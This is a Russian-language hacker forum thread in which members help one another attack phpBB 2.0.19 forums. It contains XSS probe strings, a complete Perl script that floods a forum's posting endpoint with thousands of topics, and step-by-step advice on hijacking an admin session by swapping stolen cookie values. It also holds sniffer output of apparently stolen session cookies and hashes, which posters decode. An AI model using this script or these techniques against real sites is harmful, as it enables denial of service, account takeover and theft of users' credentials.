PDA

Просмотр полной версии : phpbb 2.0.19 можно ли провести xss атаку на форумы таких версий


Taylorith
17.10.2006, 19:34
Привет всем!
ВОт такая проблема,хочу сломать форум но на нео нету ни одного эксплойта,начал изучать как составлять атаки xss,но не полностью понял о чем идет ресь,хочу чтобы вы мне поомгли в этом,скажите как для этих форумов можно составить xss атаку,я пробовал "><script>alert()</script> чтобы попробовать это я регистрируюсь на форуме вхожу в сосданную тему и отвечаю вот таким вот образом(выше),ничего не происходит,посомтрел фильтр имеет дырки или нет,пробовал '';!--"<exp>=&{()} вошел в соурс чтобы посмотреть как фильтр реагирует а там '';!--&quot;&lt;fuck&gt;=&amp;{()} вот что,я так понял дырок фильтр не имеет так как он заменил <> на другие символы,в статье HakNet (http://forum.antichat.ru/thread20140.html) как раз оттуда я все прочитал,все это написано для старых версий и на новые не проходит,я просто новичек в этом деле хочу чтобы вы немного профснили мне чсто дальше делать если фильтр фильтрует все это,что в этом случае предпринять?Если кто сможет привести пример xss атаки для форумов phpbb 2.0.19 я буду очень благодарен и как раз смогу понять в чем моя ошибка?Вернее что я должен был предпринять дальше,и впринципе все проясниться,даьше смогу сам составлять xss атаки.Спасибо заранее!!
Тока пожалуйста не ругайтесь!!)) Спасибо!!

oleg_2005
31.12.2006, 17:05
Кодируй XSS в hexe

n3r0bi0m4n
15.01.2007, 23:40
phpbb 2.0.18+ .. точно не знаю версию.

стянул сессию. меняю в куках phpbb2mysql_sid (что-то подобное), потом перезагружаю страницу. в итоге просто выкидывает..

подскажите в чем проблема может быть

zl0ba
16.01.2007, 00:01
Ьебята, здесь сплоит не давно выкладывали на форуме. Может попробуете :
#!/usr/bin/perl

print q{
__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'


=> Exploit phpBB 2.0.19 ( by SpiderZ )
=> Topic infinitely exploit
=> Sito: www.spiderz.tk

__________________________________________________ _______________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

};

use IO::Socket;

## Initialized X
$x = 0;

## Exploit phpbb 2.0.19 SpiderZ
print q(
Exploit phpBB 2.0.19 ( by SpiderZ )

);
print q(
=> Scrivi l'url del sito senza aggiungere http & www
=> Url: );
$host = <STDIN>;
chop ($host);

print q(
=> Adesso indica in quale cartella e posto il phpbb
=> di solito si trova su /phpBB2/ o /forum/
=> Cartella: );
$pth = <STDIN>;
chop ($pth);

print q(
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking "
=> );
$type = <STDIN>;
chop ($type);

## Search exploit phpbb by SpiderZ
if($type == 1){

## Search exploit phpbb by SpiderZ
while($x != 0000)
{

## Search exploit phpbb by SpiderZ
$x++;
}

## Nome attack Hacking
}
elsif ($type == hacking){

## Search exploit phpbb by SpiderZ
while($x != 10000)
{
## Invia Search exploit phpbb by SpiderZ
$postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nConnessione non riuscita: $!\n" unless $sock;

## Invia Search exploit phpbb by SpiderZ
print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## exploit phpbb by SpiderZ
syswrite STDOUT, ".";

## exploit phpbb by SpiderZ
$x++;
}
}else{

## Error Exploit phpbb
die "
Error ! riprova...
\n";
}

злюка
16.01.2007, 01:00
phpbb 2.0.18+ .. точно не знаю версию.

стянул сессию. меняю в куках phpbb2mysql_sid (что-то подобное), потом перезагружаю страницу. в итоге просто выкидывает..

подскажите в чем проблема может быть

про sid забудь он не нужен, нужно заменять pass_hash и id.

DeBugger
16.01.2007, 18:55
Ьебята, здесь сплоит не давно выкладывали на форуме.Обясни, DOS-то тут причём. Вопрос был про XSS.

n3r0bi0m4n
16.01.2007, 19:44
про sid забудь он не нужен, нужно заменять pass_hash и id.

то-есть средствами xss форум не сломать?

TTyck
16.01.2007, 20:00
n3r0bi0m4n, сломать возможно.. просто sid нужно удалять (это сессия)... а другие параметры менять.

n0ne
16.01.2007, 20:55
n3r0bi0m4n, стираешь из куков sid вообще напрочь, меняешь pass_hash на админовский, и id на админовский, перезаходишь и всё.

n3r0bi0m4n
16.01.2007, 22:00
вот то что наснифилось

IP: 82.200.251.183
QUERY: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"353cb7bc17a426dfe6670e0d95257dfa";s:6:"userid";i:2330;}; phpbb2mysql_lastid=2330; cpg133_data=YTozOntzOjI6IklEIjtzOjMyOiJlZWRlZmVkZT NlZjUwY2FmMDc1YmEyZjg0NDg0ZTdjYyI7czoyOiJhbSI7aTox O3M6MzoibGl2IjthOjI6e2k6MDtzOjM6IjM3NCI7aToxO3M6Mz oiMzY1Ijt9fQ==; PHPSESSID=11a3cb062053fcd93dc542a9341a0ee3; b=b; hotlog=1; phpbb2mysql_sid=414adeefacfbf42030f6d3b78b1ba695
REFERER: ***='<script src="***/script.js"></script>
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MRA 4.8 (build 01709); .NET CLR 1.1.4322)

эм.. а де тут хэш? =)

maxster
16.01.2007, 22:23
353cb7bc17a426dfe6670e0d95257dfa - hash

TTyck
17.01.2007, 13:47
ошибся...

$n@ke
17.01.2007, 13:54
ошибся...
эт чо???

Там де Phpsessid эт те не надо!! убивай!

DeBugger
17.01.2007, 13:59
cpg133_data=YTozOntzOjI6IklEIjtzOjMyOiJlZWRlZmVkZT NlZjUwY2FmMDc1YmEyZjg0NDg0ZTdjYyI7czoyOiJhbSI7aTox O3M6MzoibGl2IjthOjI6e2k6MDtzOjM6IjM3NCI7aToxO3M6Mz oiMzY1Ijt9fQ==;В переводе с Base64 имеем:
cpg133_data=a:3:{s:2:\"ID\";s:32:\"eedefede3ef50caf075ba2f84484e7cc\";s:2:\"am\";i:1;s:3:\"liv\";a:2:{i:0;s:3:\"374\";i:1;s:3:\"365\";}}
Отсюда, хэш eedefede3ef50caf075ba2f84484e7cc

n3r0bi0m4n
17.01.2007, 20:45
thx. +.

это md5 или mysql5 ? а то я в этом пока не сильно... :)

DeBugger
18.01.2007, 18:02
thx. +.
это md5 или mysql5 ? а то я в этом пока не сильно... :) Если с форума, то MD5.